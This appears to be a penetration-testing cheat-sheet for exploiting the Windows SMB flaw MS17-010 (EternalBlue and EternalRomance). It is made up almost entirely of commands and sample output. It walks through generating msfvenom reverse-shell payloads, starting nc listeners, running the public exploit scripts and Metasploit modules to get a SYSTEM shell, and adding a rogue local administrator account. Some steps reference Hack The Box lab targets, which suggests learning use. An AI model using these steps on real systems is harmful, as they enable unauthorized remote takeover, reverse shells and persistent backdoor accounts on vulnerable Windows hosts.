ms17_010 _cve2017_0143

MS17-010 - CVE-2017-0143 - For Windows

Manual exploit for found named pipes

Installation steps:

• https://github.com/lethanhtung01011980/Notes/wiki/impacket_ms17_010
• Use send_and_execute.py in https://github.com/helviojunior/MS17-010

Create reverse shell listener:

• nc -nlvp 5678

Get System shell:

• cd MS17-010
• python send_and_execute.py victim_ip ../revShell-winx86_p5678.exe (revShell-winx86_p5678.exe is reverse shell generated by msvenom)

Add admin user:

• https://github.com/lethanhtung01011980/Notes/wiki/Add-admin-user

Ref:

• https://ivanitlearning.wordpress.com/2019/02/24/exploiting-ms17-010-without-metasploit-win-xp-sp3/
• https://null-byte.wonderhowto.com/how-to/manually-exploit-eternalblue-windows-server-using-ms17-010-python-exploit-0195414/
• Eternal Romance: https://www.exploit-db.com/exploits/43970
• Eternal Blue: https://www.exploit-db.com/exploits/42315

Manual exploit for no named pipe

Ref: https://wiki.jacobshodd.com/writeups/hack-the-box/blue

• Use https://github.com/worawit/MS17-010
• Sample usage: https://github.com/worawit/MS17-010/blob/master/shellcode/eternalblue_sc_merge.py

This is for Windows 7 64 bit

• cd MS17-010/shellcode
• nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin
• msfvenom -p windows/x64/shell_reverse_tcp -f raw -o revshell64_10101040.bin EXITFUNC=thread LHOST=10.10.14.9 LPORT=6789
• cat eternalblue_kshellcode_x64.bin revshell64_10101040.bin > 10.10.10.40.payload.bin
• nc -nlvp 6789
• python eternalblue_exploit7.py 10.10.10.40 shellcode/10.10.10.40.payload.bin
• Got system shell

Meterpreter

• Search vulnerabilites by nmap -p 139,445 -script=smb-vuln* victim_ip
• msfconsole
• search ms17-010

Check how success-rate

• use auxiliary/admin/smb/ms17_010_command
• set RHOSTS victim_ip
• run

Exploit May need to run this to open a dummy RDP if LoginError timeout

• rdesktop victim_ip

Steps

• use windows/smb/ms17_010_psexec
• show options
• set RHOST victim_ip
• run
• getsystem <====== Escalate <====== May not need
• getuid <========Get current privilege <====== May not need
• sessions 1 <====== May not need
• shell
• C:\WINNT\system32>net user newuser newpass /add
• C:\WINNT\system32>net localgroup administrators newuser /add
• rdesktop -u newuser -p newpass victim_ip <=========== May need to run this to open a dummy RDP if LoginError timeout

Sample output

• [*] Started reverse TCP handler on attacker_ip:4444
• [*] victim_ip:445 - Target OS: Windows 5.0
• [*] victim_ip:445 - Filling barrel with fish... done
• [*] victim_ip:445 - <---------------- | Entering Danger Zone | ---------------->
• [] victim_ip:445 - [] Preparing dynamite...
• [] victim_ip:445 - [] Trying stick 1 (x86)...Boom!
• [*] victim_ip:445 - [+] Successfully Leaked Transaction!
• [*] victim_ip:445 - [+] Successfully caught Fish-in-a-barrel
• [*] victim_ip:445 - <---------------- | Leaving Danger Zone | ---------------->
• [*] victim_ip:445 - Reading from CONNECTION struct at: 0x817e39f0
• [*] victim_ip:445 - Built a write-what-where primitive...
• [+] victim_ip:445 - Overwrite complete... SYSTEM session obtained!
• [*] victim_ip:445 - Selecting native target
• [*] victim_ip:445 - Uploading payload... BTVbzIuF.exe
• [*] victim_ip:445 - Created \BTVbzIuF.exe...
• [+] victim_ip:445 - Service started successfully...
• [*] Sending stage (179779 bytes) to victim_ip
• [*] victim_ip:445 - Deleting \BTVbzIuF.exe...
• [*] Meterpreter session 1 opened (attacker_ip:4444 -> victim_ip:1157) at 201x-xx-xx 01:15:31 -0400

Ref: https://null-byte.wonderhowto.com/how-to/exploit-eternalblue-windows-server-with-metasploit-0195413/